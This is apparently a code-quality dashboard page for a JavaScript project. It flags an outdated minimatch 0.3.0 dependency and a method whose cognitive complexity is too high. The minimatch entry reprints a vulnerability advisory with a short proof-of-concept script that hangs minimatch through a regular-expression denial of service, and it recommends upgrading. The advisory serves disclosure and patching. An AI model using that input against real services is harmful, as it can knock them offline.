Showing 22 of 22 total issues
minimatch
Regular Expression Denial of Service Open
"minimatch": {
"version": "0.3.0",
"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.3.0.tgz",
"integrity": "sha1-J12O2qxPG7MyZHIInnlJyDlGmd0=",
"dev": true,
- Read upRead up
- Exclude checks
Regular Expression Denial of Service
Overview:
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp
objects. The primary function, minimatch(path, pattern)
is vulnerable to ReDoS in the pattern
parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,
. The problematic portion of the regex is ((?:\\{2})*)
which matches against \\
.
A proof of concept is as follows: ``` var minimatch = require(“minimatch”);
// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }
var exploit = “[!” + genstr(1000000, “\”) + “A”;
// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```
Recommendation:
Updated to version 3.0.2 or greater
Function _compileMessage
has a Cognitive Complexity of 6 (exceeds 5 allowed). Consider refactoring. Open
RelativeFormat.prototype._compileMessage = function (units) {
// `this._locales` is the original set of locales the user specified to the
// constructor, while `this._locale` is the resolved root locale.
var locales = this._locales;
var resolvedLocale = this._locale;
- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"